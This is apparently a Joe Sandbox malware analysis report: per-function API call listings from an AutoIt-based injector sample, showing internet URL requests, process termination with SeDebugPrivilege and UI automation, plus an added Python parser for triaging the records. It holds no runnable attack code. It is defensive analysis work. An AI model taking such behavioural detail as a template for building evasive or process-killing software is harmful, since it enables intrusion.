                                                                                                                                                                              • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
                                                                                                                                                                              • Part of subcall function 008B4536: GetClassNameW.USER32(?,?,000000FF), ref: 008B4559
                                                                                                                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 008B27F4
                                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 008B27FF
                                                                                                                                                                            • GetParent.USER32 ref: 008B281B
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 008B281E
                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 008B2827
                                                                                                                                                                            • GetParent.USER32(?), ref: 008B283B
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 008B283E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 711023334-1403004172
                                                                                                                                                                            • Opcode ID: 60bbf11fbbc16a1ac17aee7597ca7c000b6c84b8030ff7c61295e0db493892e3
                                                                                                                                                                            • Instruction ID: e839a08ee672d512394cd040749a2fa6bcf0117b1f6ef25c83fd6b1f5860c87c
                                                                                                                                                                            • Opcode Fuzzy Hash: 60bbf11fbbc16a1ac17aee7597ca7c000b6c84b8030ff7c61295e0db493892e3
                                                                                                                                                                            • Instruction Fuzzy Hash: 0921B074900218BBCF11ABA4DC85AEEBBB8FF15310F104116B961AB2A2DB794808DB60
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
                                                                                                                                                                              • Part of subcall function 008B4536: GetClassNameW.USER32(?,?,000000FF), ref: 008B4559
                                                                                                                                                                            • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 008B28D3
                                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 008B28DE
                                                                                                                                                                            • GetParent.USER32 ref: 008B28FA
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 008B28FD
                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 008B2906
                                                                                                                                                                            • GetParent.USER32(?), ref: 008B291A
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 008B291D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 711023334-1403004172
                                                                                                                                                                            • Opcode ID: 8f3a28b331cdbd4581802c69231266ec34a8a0358fc1f72cbaa59e0e6658f30e
                                                                                                                                                                            • Instruction ID: a641064b0e2543ca953764eb03b431bde7d4ce97c714580aec886e4eee1f3faa
                                                                                                                                                                            • Opcode Fuzzy Hash: 8f3a28b331cdbd4581802c69231266ec34a8a0358fc1f72cbaa59e0e6658f30e
                                                                                                                                                                            • Instruction Fuzzy Hash: B421C375E40218BBCF11AFA4DC85EEEBBB8FF14300F004016B951EB2A6DB794849DB60
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 008E43FC
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 008E43FF
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 008E4426
                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008E4449
                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 008E44C1
                                                                                                                                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 008E450B
                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 008E4526
                                                                                                                                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 008E4541
                                                                                                                                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 008E4555
                                                                                                                                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 008E4572
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 312131281-0
                                                                                                                                                                            • Opcode ID: b4c25aca0bf409489519f8f034d01bea45d73389f5d60683f022a91fbd6ce91d
                                                                                                                                                                            • Instruction ID: 4104224e2158993ede632c8fe8f3adb227adff68a58e4cd1196e9e92485cfb73
                                                                                                                                                                            • Opcode Fuzzy Hash: b4c25aca0bf409489519f8f034d01bea45d73389f5d60683f022a91fbd6ce91d
                                                                                                                                                                            • Instruction Fuzzy Hash: B9617B75900248AFDB21DFA8CC81EEE77B8FB4A314F104169FA18E72A1C774AA45DF50
                                                                                                                                                                            APIs
                                                                                                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008CCBCF
                                                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008CCBF7
                                                                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008CCC27
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008CCC7F
                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 008CCC93
                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 008CCC9E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3113390036-3916222277
                                                                                                                                                                            • Opcode ID: 687e6c490a4f870f9a01b1e7271d4eb0f4bcf9826500f6b25285d5e1b178449c
                                                                                                                                                                            • Instruction ID: 3cd2c9fec697435a6862d384e5d2287522427761babe5007d9c52ca9f91f0766
                                                                                                                                                                            • Opcode Fuzzy Hash: 687e6c490a4f870f9a01b1e7271d4eb0f4bcf9826500f6b25285d5e1b178449c
                                                                                                                                                                            • Instruction Fuzzy Hash: 98311AB5500708AFD721AF658D88FAB7BFCFB49744B10452EF44ED6200DB35D9099B61
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00895437,?,?,Bad directive syntax error,008EDCD0,00000000,00000010,?,?), ref: 008BA14B
                                                                                                                                                                            • LoadStringW.USER32(00000000,?,00895437,?), ref: 008BA152
                                                                                                                                                                              • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
                                                                                                                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 008BA216
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: HandleLoadMessageModuleString_wcslen
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 858772685-4153970271
APIs
• GetParent.USER32 ref: 008B293B
• GetClassNameW.USER32(00000000,?,00000100), ref: 008B2950
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008B29DD
Strings
Similarity
• API ID: ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1290815626-3381328864
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008CCADF
• GetLastError.KERNEL32 ref: 008CCAF2
• SetEvent.KERNEL32(?), ref: 008CCB06
  • Part of subcall function 008CCBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008CCBCF
  • Part of subcall function 008CCBB0: GetLastError.KERNEL32 ref: 008CCC7F
  • Part of subcall function 008CCBB0: SetEvent.KERNEL32(?), ref: 008CCC93
  • Part of subcall function 008CCBB0: InternetCloseHandle.WININET(00000000), ref: 008CCC9E
Similarity
• API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
• String ID:
• API String ID: 337547030-0
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,008B1CD9,?,?,00000000), ref: 008B209C
• HeapAlloc.KERNEL32(00000000,?,008B1CD9,?,?,00000000), ref: 008B20A3
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,008B1CD9,?,?,00000000), ref: 008B20B8
• GetCurrentProcess.KERNEL32(?,00000000,?,008B1CD9,?,?,00000000), ref: 008B20C0
• DuplicateHandle.KERNEL32(00000000,?,008B1CD9,?,?,00000000), ref: 008B20C3
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,008B1CD9,?,?,00000000), ref: 008B20D3
• GetCurrentProcess.KERNEL32(008B1CD9,00000000,?,008B1CD9,?,?,00000000), ref: 008B20DB
• DuplicateHandle.KERNEL32(00000000,?,008B1CD9,?,?,00000000), ref: 008B20DE
• CreateThread.KERNEL32(00000000,00000000,008B2104,00000000,00000000,00000000), ref: 008B20F8
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
APIs
  • Part of subcall function 008BDC9C: CreateToolhelp32Snapshot.KERNEL32 ref: 008BDCC1
  • Part of subcall function 008BDC9C: Process32FirstW.KERNEL32(00000000,?), ref: 008BDCCF
  • Part of subcall function 008BDC9C: CloseHandle.KERNELBASE(00000000), ref: 008BDD9C
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 008DAACC
• GetLastError.KERNEL32 ref: 008DAADF
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 008DAB12
• TerminateProcess.KERNEL32(00000000,00000000), ref: 008DABC7
• GetLastError.KERNEL32(00000000), ref: 008DABD2
• CloseHandle.KERNEL32(00000000), ref: 008DAC23
Strings
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 008E4284
• SendMessageW.USER32(00000000,00001036,00000000,?), ref: 008E4299
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 008E42B3
• _wcslen.LIBCMT ref: 008E42F8
• SendMessageW.USER32(?,00001057,00000000,?), ref: 008E4325
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 008E4353
Strings
Similarity
• API ID: MessageSend$Window_wcslen
• String ID: SysListView32
• API String ID: 2147712094-78025650
APIs
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008BC5D9
• IsMenu.USER32(00000000), ref: 008BC5F9
• CreatePopupMenu.USER32 ref: 008BC62F
• GetMenuItemCount.USER32(00FF57C0), ref: 008BC680
• InsertMenuItemW.USER32(00FF57C0,?,00000001,00000030), ref: 008BC6A8
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup
• String ID: 0$2
• API String ID: 93392585-3793063076
• Opcode ID: a2b62c999511a44f3e6f2d7f2cf27d48b53f15a51bde7bde572ba8697c59ea35
• Instruction ID: a80bd4a957735ff6aeb18f08b226347abc6cfed30383ced35fdaebaa4e88cbf2
• Opcode Fuzzy Hash: a2b62c999511a44f3e6f2d7f2cf27d48b53f15a51bde7bde572ba8697c59ea35
• Instruction Fuzzy Hash: F6517E70A00249ABDB20CF68C984EEEBBF5FF6A314F14512DE411DB391E7709944CB62
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 642191829-3771769585
• Opcode ID: 7034032ceb4bb0b5e4d69cec17925c823f4f0202a966942a2036323e2741ae00
• Instruction ID: 0f2787969f11be65377153fa45c44ead96a8001cf30bc2831fffd9f495353788
• Opcode Fuzzy Hash: 7034032ceb4bb0b5e4d69cec17925c823f4f0202a966942a2036323e2741ae00
• Instruction Fuzzy Hash: 8B112131904219AFDB306B249C8AEDA37BCFF41310F1000A5F549DA192EFB0CA849A62
APIs
• VariantInit.OLEAUT32(?), ref: 008D42C8
• CharUpperBuffW.USER32(?,?), ref: 008D43D7
• _wcslen.LIBCMT ref: 008D43E7
• VariantClear.OLEAUT32(?), ref: 008D457C
  • Part of subcall function 008C15B3: VariantInit.OLEAUT32(00000000), ref: 008C15F3
  • Part of subcall function 008C15B3: VariantCopy.OLEAUT32(?,?), ref: 008C15FC
  • Part of subcall function 008C15B3: VariantClear.OLEAUT32(?), ref: 008C1608
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4137639002-1221869570
• Opcode ID: 1c092988726af321c9e8aec2d0fb776d9871bb69ccc9d3037bec63476c8f7978
• Instruction ID: 298ff4f4b5b5b57c7fb43a9dd3a5731864e8f1ae01830a63288dccd537de96d8
• Opcode Fuzzy Hash: 1c092988726af321c9e8aec2d0fb776d9871bb69ccc9d3037bec63476c8f7978
• Instruction Fuzzy Hash: 459124756083459FCB04DF68C48196AB7E5FB88314F14892EF88ADB351DB30ED49CB92
APIs
• GetMenu.USER32(?), ref: 008E2AE2
• GetMenuItemCount.USER32(00000000), ref: 008E2B14
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 008E2B3C
• _wcslen.LIBCMT ref: 008E2B72
• GetMenuItemID.USER32(?,?), ref: 008E2BAC
• GetSubMenu.USER32(?,?), ref: 008E2BBA
  • Part of subcall function 008B42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 008B42E6
  • Part of subcall function 008B42CC: GetCurrentThreadId.KERNEL32 ref: 008B42ED
  • Part of subcall function 008B42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008B2E43), ref: 008B42F4
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008E2C42
  • Part of subcall function 008BF1A7: Sleep.KERNEL32 ref: 008BF21F
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
• String ID:
• API String ID: 4196846111-0
• Opcode ID: 950423901810b07f98f019eb7bbc1cfb7dba2afbcb9a974c4a6fd8d54d19f79b
• Instruction ID: 94a71a9851061eee4038d6e6e8dfa6861c4642d9645572d8cc7fa46befd35b1f
• Opcode Fuzzy Hash: 950423901810b07f98f019eb7bbc1cfb7dba2afbcb9a974c4a6fd8d54d19f79b
• Instruction Fuzzy Hash: FE71AE35A00259EFCB10EF69C881AAEB7F5FF49324F148459E816EB351DB34EE418B91
APIs
• IsWindow.USER32(00000000), ref: 008E8896
• IsWindowEnabled.USER32(00000000), ref: 008E88A2
• SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 008E897D
• SendMessageW.USER32(00000000,000000B0,?,?), ref: 008E89B0
• IsDlgButtonChecked.USER32(?,00000000), ref: 008E89E8
• GetWindowLongW.USER32(00000000,000000EC), ref: 008E8A0A
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 008E8A22
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID:
• API String ID: 4072528602-0
• Opcode ID: a60dc82c433d8fe37dee268a141da57a7090d598793c1d005f241a94a96b74ad
• Instruction ID: 1b986c98173b1b0062620c01597d99e1a7b976392b76527b4a9b09fa42add168
• Opcode Fuzzy Hash: a60dc82c433d8fe37dee268a141da57a7090d598793c1d005f241a94a96b74ad
• Instruction Fuzzy Hash: 98719B34A04298EFEB259F56C894FBE7BB9FF0A300F140469E859D7262CB31AD41DB11
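The records above are the raw per-function output Joe Sandbox emits for the image at 00850000 in process 7 (the AutoIt runtime the injector runs in): an "APIs" list of call sites, a "$"-separated "String ID", the memory-dump provenance and the fuzzy hashes. When a report has thousands of these it is faster to parse them than to read them, so the following is an added example, not code from the report or from Joe Sandbox, of a Python parser that turns such records into objects and tags the functions that matter for triage (here: the gethostname/gethostbyname/inet_ntoa local-IP lookup and the AttachThreadInput/PostMessageW/SendMessageW UI-driving routines). The SAMPLE text is an excerpt copied from the records on this page; the WATCHLIST tags and the "lowest direct call site approximates the function start" heuristic are assumptions of this example, not something the report states.

```python
"""Parse Joe Sandbox per-function records (APIs / Strings / Memory Dump Source /
Similarity) from report text and tag each function for triage. Added example;
the watch-list and the entry-address heuristic are assumptions, not Joe Sandbox's."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One API bullet as printed, with or without an argument list, optionally
# prefixed by "Part of subcall function XXXXXXXX: ".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Assumed triage watch-list: lower-case substrings matched against API names and the
# "API ID" summary (a concatenated list, so only substring search works on it).
WATCHLIST = {
    "host-ip-enum": ("gethostname", "gethostbyname", "inet_ntoa"),
    "ui-automation": ("attachthreadinput", "postmessage", "sendmessage", "insertmenuitem"),
    "variant-marshalling": ("variantinit", "variantcopy", "sysallocstring"),
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                       # call-site address as printed (8 hex digits)
    subcall: Optional[str] = None  # callee address when reported as a subcall


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    meta: dict = field(default_factory=dict)

    @property
    def entry(self) -> Optional[int]:
        """Lowest direct call site; heuristic stand-in for the function start."""
        direct = [int(a.ref, 16) for a in self.apis if a.subcall is None]
        return min(direct) if direct else None

    def tags(self) -> List[str]:
        hay = " ".join(a.name for a in self.apis).lower() + " " + self.meta.get("API ID", "").lower()
        return sorted(t for t, kws in WATCHLIST.items() if any(k in hay for k in kws))


def parse_records(text: str) -> List[FunctionRecord]:
    """Every 'APIs' header starts a new record; bullets are routed by section."""
    records: List[FunctionRecord] = []
    cur, section = None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":
                cur = FunctionRecord()
                records.append(cur)
            section = line
            continue
        if cur is None:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a for a in (m.group("args") or "").split(",") if a]
                cur.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                        m.group("ref").upper(), m.group("sub")))
            continue
        if section == "Strings":
            cur.strings.append(line)
            continue
        key, _, val = line.partition(":")
        key, val = key.strip(), val.strip()
        if key == "Source File":      # "...sdmp, Offset: 00850000, based on PE: true"
            parts = [p.strip() for p in val.split(",")]
            cur.meta["Source File"] = parts[0]
            for p in parts[1:]:
                k, _, v = p.partition(":")
                cur.meta[k.strip()] = v.strip()
        elif key == "Associated":     # drop the fused "Download File" link label
            cur.meta.setdefault("Associated", []).append(val.replace("Download File", "").strip())
        elif key == "String ID":      # '$'-separated list of referenced strings
            cur.strings.extend(s for s in val.split("$") if s)
        else:
            cur.meta[key] = val
    return records


def summarise(records: List[FunctionRecord]) -> List[str]:
    """One triage line per function: entry, tags, distinct API names, strings."""
    out = []
    for r in records:
        entry = f"{r.entry:08X}" if r.entry is not None else "????????"
        names = ",".join(dict.fromkeys(a.name for a in r.apis)) or r.meta.get("API ID", "")
        out.append(f"{entry} {'/'.join(r.tags()) or '-'} apis=[{names}] strings={r.strings}")
    return out


# Constructed sample: an excerpt of the records printed on this page.
SAMPLE = """\
APIs
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008BC5D9
• IsMenu.USER32(00000000), ref: 008BC5F9
• CreatePopupMenu.USER32 ref: 008BC62F
• GetMenuItemCount.USER32(00FF57C0), ref: 008BC680
• InsertMenuItemW.USER32(00FF57C0,?,00000001,00000030), ref: 008BC6A8
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup
• String ID: 0$2
APIs
Strings
Similarity
• API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
APIs
• GetMenu.USER32(?), ref: 008E2AE2
• _wcslen.LIBCMT ref: 008E2B72
  • Part of subcall function 008B42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008B2E43), ref: 008B42F4
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008E2C42
Similarity
• API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
• String ID:
"""

if __name__ == "__main__":
    for line in summarise(parse_records(SAMPLE)):
        print(line)
```

Run it against a report saved as text (copy the function listing into a file and pass it to parse_records) and grep the summary for the tags you care about. Note that the second record in the sample has no API bullets at all and is only recoverable from its "API ID" line, which is why tagging falls back to substring search on that concatenated field.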
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008B80D1
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008B80F7
• SysAllocString.OLEAUT32(00000000), ref: 008B80FA
• SysAllocString.OLEAUT32 ref: 008B811B
• SysFreeString.OLEAUT32 ref: 008B8124
• StringFromGUID2.OLE32(?,?,00000028), ref: 008B813E
• SysAllocString.OLEAUT32(?), ref: 008B814C
Memory Dump Source
